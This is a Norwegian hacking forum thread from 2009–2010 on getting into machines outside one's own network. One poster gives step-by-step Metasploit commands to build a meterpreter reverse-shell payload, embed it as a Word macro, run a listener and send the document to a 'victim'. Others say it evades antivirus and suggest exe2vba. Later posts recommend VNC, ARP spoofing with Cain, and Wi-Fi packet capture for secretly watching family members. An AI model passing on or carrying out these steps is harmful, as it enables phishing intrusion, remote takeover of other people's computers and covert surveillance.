Få tilgang utenfor nettverk

15. november 2009

Hei,
et lite hypotetisk spørsmål fra en noob. Dersom du alt har tilgang til et nettverk er det flere muligheter å hacke seg til andre hoster på samme nettverk. (nmap - ping sweep osvosv.) Men dersom man ønsker tilgang utenfor nettverket du alt er tilkoblet, hvilke muligheter har du da utover bruk av RAT/Trojaner? (med andre ord krysse fingere for at mottaker skal åpne en suspicious mail). De aller fleste "private brukere" befinner seg bak en ISP, så selve router adressen er vel heller ikke særlig tilgjengelig??

saroth

731 78

15. november 2009

få han til kjøre et program som kobler deg til deg. f.eks. en metasploit payload i en exe-fil eller i et word/excel dokument. men det forutsetter jo at han åpner en suspekt mail ja.
det er jo en trojaner da, men blir som oftest ikke tatt av antivirus :-)

Sist endret av saroth; 15. november 2009 kl. 01:03.

cayenne

Trådstarter

19 0

15. november 2009

Det er ingen dum idè, men min erfaring er den at om man prøver å skjule en exe-fil i et word/excel dokument, blir man ikke kvitt .exe endelsen på filen, og mottaker får heller ikke åpnet opp dokumentet på vanlig måte?? (please correct me if i'm wrong)

Sist endret av cayenne; 15. november 2009 kl. 01:46.

Deezire

Tastaturkriger

5.279 2.045

15. november 2009

Da vet du åpenbart ikke hva en exploit er.

cayenne

Trådstarter

19 0

15. november 2009

Neivel, da kan du kanskje forklare meg hvordan en exploit fungerer f.eks. integrert i en .doc fil? ..i motsetning til en RAT server?

DfenZ

benzonerd

1.640 886

15. november 2009

Exploit
http://en.wikipedia.org/wiki/Exploit_(computer_security)

saroth

731 78

15. november 2009

Sitat av cayenne

Vis hele sitatet...

stikkord: makroer!

jeg har ikke lyst til å gi noen tutorial på dette.

Taffer

Taffer'n

176 37

15. november 2009

Trodde de hadde fikset exploitn til word-documente jeg ?
viss ikke, vil jeg gjerne få vite åssn d gjøres.
Hadde vør nyttig, nå som jeg laster opp leksene på fronter som word filer (:

saroth

731 78

15. november 2009

du er avhengig av at den som åpner filene sier ja til å kjøre makroer da.

Taffer

Taffer'n

176 37

15. november 2009

hadde du gadda å lagt sammen en short tut?

Masi

1.093 192

15. november 2009

Jeg kan gi en liten kort tutorial på dette, skal ikke si at jeg husker rett, men prøver værtfall, og jeg har ikke office 2003 for å finne ut hva de forskjellige menyene heter.
Før jeg starter så vil jeg bare si at jeg ikke tar noe ansvar for hva dere bruker dette til, eller konsikvensene dere får.

PS: Jeg skriv kun om bruk på linux.

1. Dere finner frem til metasploit mappe.
2 ../msfpayload (payloadnavn) (payload Options) V > navn.bas

eks:
./msfpayload windows/meterpreter/reverse_tcp lhost=192.168.0.2 lport=4444 V > navn.bas

3. så tar dere denne navn.bas filen og finner en MS office 2003, der skal du finne "macro" under en av menyene, så videre så skal det være noe som heter "legg til fil" å der skal dere kunne importere navn.bas filen. Lagre word dokumentet

Sett opp en listener med følgende kommando:
4. ./msfcli multi/handler payload=window/meterpreter/reverse_tcp lhost=192.168.0.2 lport=4444 E

5. Så sender dere word filen til ett offer

Jeg leste en guide på akkurat dette for par mnd siden på ett annet forum, men finner ikke den igjen. Så jeg stoler på hukomelsen

Sist endret av Masi; 15. november 2009 kl. 20:55.

Masi

1.093 192

15. november 2009

Sitat av saroth

riktig. veldig fin og litt skummel sak.

Vis hele sitatet...

Japp, skal innrømme det sikkerhetshullet kan være ganske skummelt...
Den er sikkert litt rotat skrevet med tanke på at jeg er litt fyllesjuk, og klarer såvidt å tenke. Men jeg fikk testet den ut på office 2007, å der fungerte den ikke.

saroth

731 78

16. november 2009

Sitat av Masi

Vis hele sitatet...

jeg har testet den på fullpatchet office 2007 sammen med fullpatchet windows 7, med antivirus. og den funker for meg..

Masi

1.093 192

16. november 2009

Sitat av saroth

jeg har testet den på fullpatchet office 2007 sammen med fullpatchet windows 7, med antivirus. og den funker for meg..

Vis hele sitatet...

Det kan hende at han som æ sende *.bas filen til ikke gjorde nøyaktig som jeg sa, for jeg har ikke windows eller MS office, så jeg måtte få en kompis til å fikse den delen :P

saroth

731 78

16. november 2009

ok.
alltid kjekt å ha en virtuell maskin med windows

Masi

1.093 192

16. november 2009

Joda, men jeg har ikke orket å sette opp VM for å kjøre windows, for jeg løser de fleste problemer i linux, og hvis det er noe som ikke lar seg løse hurtig i linux så har jeg alltid kompiser med windows maskiner.

blåveispiken

28 2

16. november 2009

Jeg skjønner jo selvsagt ikke -noe- av dette, men er det sånn at hvis datteren min sitter på en maskin, og jeg på en annen i samme nettverk, så kan jeg se hvilke sider hun er på?

ranvik

Hva er neste?

4.402 1.381

16. november 2009

Sitat av blåveispiken

Jeg skjønner jo selvsagt ikke -noe- av dette, men er det sånn at hvis datteren min sitter på en maskin, og jeg på en annen i samme nettverk, så kan jeg se hvilke sider hun er på?

Vis hele sitatet...

kort forklart ja.

blåveispiken

28 2

16. november 2009

Å da må man selvsagt være et geni for å få dét til.....*sukk*

saroth

731 78

16. november 2009

Sitat av blåveispiken

Jeg skjønner jo selvsagt ikke -noe- av dette, men er det sånn at hvis datteren min sitter på en maskin, og jeg på en annen i samme nettverk, så kan jeg se hvilke sider hun er på?

Vis hele sitatet...

det finnes mange andre enklere måter du kan overvåke barna dine på da.

Taffer

Taffer'n

176 37

17. november 2009

vil det si at du kan få .exe filer til å starte opp gjennom makroer i Word?

Masi

1.093 192

17. november 2009

Sitat av Taffer

vil det si at du kan få .exe filer til å starte opp gjennom makroer i Word?

Vis hele sitatet...

Nei, det er vel bare VB kildekode du kan kjøre fra macro.

saroth

731 78

17. november 2009

Sitat av Taffer

vil det si at du kan få .exe filer til å starte opp gjennom makroer i Word?

Vis hele sitatet...

ja det kan jeg, men må først gjøre den om til et VB-script. i metasploit er det et verktøy som heter exe2vba (hvis jeg husker riktig)

blåveispiken

28 2

18. november 2009

Sitat av saroth

det finnes mange andre enklere måter du kan overvåke barna dine på da.

Vis hele sitatet...

Titte over skulderen til de??
Men ærlig talt, er det ingen lettvint måte å komme seg inn på?

Masi

1.093 192

19. november 2009

Sitat av blåveispiken

Titte over skulderen til de??
Men ærlig talt, er det ingen lettvint måte å komme seg inn på?

Vis hele sitatet...

Joda, det kommer ann på. Hvis du har fysisk tilgang til PCen dems så finnes det ett hav av muligheter som lar seg gjennomføre av den gjennomsnittelige data bruker.

Du har jo remote-control programmer som VNC. der du installerer en server på maskinene dems, og en viewer på din, så kan du koble til maskinene dems og følge med på hva dem gjør. Og du har også mulighet for å kontrollere PCen dems da.

Nå vet jeg ikke hvor gamle ungene dine er, men jeg syns nå det er litt dårlig gjort av deg å sitte å følge med på ongene dine ved hjelp av slike programmer, du kan heller stikke innom dem i ny å ne og se hva dem gjør. Jeg vet ikke om hvor mye du stoler på ungene dine, men vi si at dette er tillitsvikt.

Det er bedre å snakke me ungene dine og lage nettregler.

▼ ... mange måneder senere ... ▼

fetter

2.508 2.171

25. mai 2010

Sitat av blåveispiken

Titte over skulderen til de??
Men ærlig talt, er det ingen lettvint måte å komme seg inn på?

Vis hele sitatet...

Det finnes nok dessverre ingen brukervennlige "point-and-click" programmer for overvåking av lokalnettverk. Selv når du har satt opp sniffingen vil du sitte igjen med en gigantisk logg som er ganske uforståelig for folk som ikke kan så mye om det.

ranvik

Hva er neste?

4.402 1.381

25. mai 2010

Sitat av fetter

Vis hele sitatet...

feil.
har du telenor speedtouch med 4 porter router og wlan, så koble deg til port nr 1.
start opp det du vil overåke: http://www.effetech.com/

har du ikke speedtouch fra telenor :
alt annet bruk cain (arp spoofing) så bruker du : http://www.effetech.com

Sist endret av ranvik; 25. mai 2010 kl. 15:15.

fetter

2.508 2.171

25. mai 2010

Sitat av ranvik

feil.
har du telenor speedtouch med 4 porter router og wlan, så koble deg til port nr 1.
start opp det du vil overåke: http://www.effetech.com/

Vis hele sitatet...

Så feil kan man ta. Det har tydeligvis skjedd en del på det området siden jeg holdt på med det. Det er jo riktignok ikke gratis-programmer, men ok.

Sitat av ranvik

har du ikke speedtouch fra telenor :
alt annet bruk cain (arp spoofing) så bruker du : http://www.effetech.com

Vis hele sitatet...

Det var ARP spoofing jeg tenkte på når jeg mente at det ikke var noen enkel måte. Finnes det noen enkle programmer på dette området jeg ikke vet om?

Sist endret av fetter; 25. mai 2010 kl. 15:19.

ranvik

Hva er neste?

4.402 1.381

25. mai 2010

hvis du skal kun sniffe wlan, så laste ned "CommView for WiFi" save alle pakken som blir samlet og åpne dem i cain.
det krever ikke noe arp spoofing. men du sniffer og dumper bare alt til cap fil. demo er max 5000pakker.